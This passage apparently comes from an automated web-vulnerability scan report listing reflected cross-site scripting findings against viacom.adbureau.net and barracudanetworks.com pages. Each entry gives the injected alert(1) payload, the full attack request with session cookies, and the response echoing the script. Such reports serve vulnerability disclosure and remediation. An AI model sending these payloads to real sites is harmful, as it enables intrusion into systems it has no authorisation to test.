Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 9999
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload1027,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
equiredVersion);\r\n}\r\n}\r\n}\r\ndetectPluginTFR1301674168897();\r\nvar _TFR1301674168897_Instance =\r\n{\r\nclick : \"http://viacom.adbureau.net/accipiter/adclick/CID=000004030000000000000000/heighte6779';alert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1/relocate=\",\r\nclickThruUrl: \"http://clk.redcated/go/mtvnsdrv0010001160apm/direct;wi.300;hi.250;ai.204747641.208196969;ct.$num$/01/\",\r
...[SNIP]...

3.107. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56888'%3balert(1)//4857672fae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56888';alert(1)//4857672fae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888'%3balert(1)//4857672fae1=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2858
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload1027,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
empStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000004030000000000000000/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888';alert(1)//4857672fae1=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload1027';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.108. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10202'%3balert(1)//4440355789c was submitted in the REST URL parameter 1. This input was echoed as 10202';alert(1)//4440355789c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver10202'%3balert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2306
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac000000000000000010202';alert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';



...[SNIP]...

3.109. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac12'%3balert(1)//af0eabc09d9 was submitted in the REST URL parameter 2. This input was echoed as cac12';alert(1)//af0eabc09d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/heightcac12'%3balert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS25
Content-Type: text/html
Content-Length: 2306
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
Str = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/heightcac12';alert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try
...[SNIP]...

3.110. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400d4'%3balert(1)//32c671dbab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 400d4';alert(1)//32c671dbab7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4'%3balert(1)//32c671dbab7=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS15
Content-Type: text/html
Content-Length: 2309
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
(tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4';alert(1)//32c671dbab7=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.111. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1666f"><script>alert(1)</script>c233875c8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?1666f"><script>alert(1)</script>c233875c8f4=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: locale=+; expires=Tue, 19-Apr-2011 19:39:15 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A0%3A%7B%7D; expires=Thu, 19-May-2011 19:47:35 GMT; path=/
Date: Tue, 19 Apr 2011 19:47:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="1666f"><script>alert(1)</script>c233875c8f4" value="1" />
...[SNIP]...

3.112. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe9f"><script>alert(1)</script>f4cf3321ed5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/?L=en&dbe9f"><script>alert(1)</script>f4cf3321ed5=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/purchase/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.1.10.1303306562

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: locale=+; expires=Wed, 20-Apr-2011 13:27:22 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 13:35:42 GMT; path=/
Date: Wed, 20 Apr 2011 13:35:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="dbe9f"><script>alert(1)</script>f4cf3321ed5" value="1" />
...[SNIP]...

3.113. http://www.barracudanetworks.com/ns/company/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/company/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d81"><script>alert(1)</script>d58425295a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/company/?44d81"><script>alert(1)</script>d58425295a3=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.2.10.1303306562

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 13:36:04 GMT; path=/
Date: Wed, 20 Apr 2011 13:36:03 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="44d81"><script>alert(1)</script>d58425295a3" value="1" />
...[SNIP]...

3.114. http://www.barracudanetworks.com/ns/products/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d50"><script>alert(1)</script>49c5ce14246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/?89d50"><script>alert(1)</script>49c5ce14246=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/company/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.3.10.1303306562

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 13:36:29 GMT; path=/
Date: Wed, 20 Apr 2011 13:36:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="89d50"><script>alert(1)</script>49c5ce14246" value="1" />
...[SNIP]...

3.115. http://www.barracudanetworks.com/ns/products/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464b5"><script>alert(1)</script>9af30aa4e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/index.php?464b5"><script>alert(1)</script>9af30aa4e31=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303243982.1303304004.3; __utmc=91832325; __utmb=91832325.1.10.1303304004

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 12:53:29 GMT; path=/
Date: Wed, 20 Apr 2011 12:53:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="464b5"><script>alert(1)</script>9af30aa4e31" value="1" />
...[SNIP]...

3.116. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/purewire_web_security_service_overview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc91"><script>alert(1)</script>38b325e3a40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/purewire_web_security_service_overview.php?5cc91"><script>alert(1)</script>38b325e3a40=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; barra_hidden_menus=a%3A0%3A%7B%7D; __utma=91832325.187649019.1303169116.1303169116.1303243982.2

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: locale=+; expires=Wed, 20-Apr-2011 12:45:06 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 12:53:26 GMT; path=/
Date: Wed, 20 Apr 2011 12:53:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="5cc91"><script>alert(1)</script>38b325e3a40" value="1" />
...[SNIP]...

3.117. http://www.barracudanetworks.com/ns/products/spam_overview.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/spam_overview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2964"><script>alert(1)</script>027de165552 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/spam_overview.php?f2964"><script>alert(1)</script>027de165552=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.4.10.1303306562

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Fri, 20-May-2011 13:36:43 GMT; path=/
Date: Wed, 20 Apr 2011 13:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="f2964"><script>alert(1)</script>027de165552" value="1" />
...[SNIP]...

3.118. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/web-site-firewall-overview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a4ca"><script>alert(1)</script>921665f2e0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/products/web-site-firewall-overview.php?6a4ca"><script>alert(1)</script>921665f2e0e=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: locale=+; expires=Tue, 19-Apr-2011 19:39:22 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Thu, 19-May-2011 19:47:42 GMT; path=/
Date: Tue, 19 Apr 2011 19:47:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="6a4ca"><script>alert(1)</script>921665f2e0e" value="1" />
...[SNIP]...

3.119. http://www.barracudanetworks.com/ns/purchase/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/purchase/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af309"><script>alert(1)</script>c537b15be43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/purchase/?af309"><script>alert(1)</script>c537b15be43=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(0x21)%3C/script%3E921665f2e0e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
